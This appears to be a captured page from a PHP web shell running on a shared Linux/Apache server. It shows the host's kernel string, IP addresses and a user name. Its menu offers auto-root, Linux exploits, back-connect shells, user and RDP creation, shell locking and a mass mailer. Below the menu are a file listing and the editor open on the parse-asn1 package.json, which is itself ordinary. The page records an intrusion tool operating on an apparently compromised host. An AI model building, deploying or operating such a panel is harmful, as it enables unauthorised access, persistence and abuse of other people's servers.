Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
parse-asn1 /
[ HOME SHELL ]
Name
Size
Permission
Action
aesid.json
501
B
-rw-r--r--
asn1.js
3.14
KB
-rw-r--r--
certificate.js
2.37
KB
-rw-r--r--
fixProc.js
1.2
KB
-rw-r--r--
index.js
3.63
KB
-rw-r--r--
package.json
771
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "parse-asn1", "version": "5.1.6", "description": "utility library for parsing asn1 files for use with browserify-sign.", "main": "index.js", "files": [ "asn1.js", "aesid.json", "certificate.js", "fixProc.js", "index.js" ], "scripts": { "unit": "node ./test", "standard": "standard", "test": "npm run standard && npm run unit" }, "repository": { "type": "git", "url": "git://github.com/crypto-browserify/parse-asn1.git" }, "author": "", "license": "ISC", "dependencies": { "asn1.js": "^5.2.0", "browserify-aes": "^1.0.0", "evp_bytestokey": "^1.0.0", "pbkdf2": "^3.0.3", "safe-buffer": "^5.1.1" }, "devDependencies": { "standard": "^14.3.4", "tape": "^5.0.1" } }
Close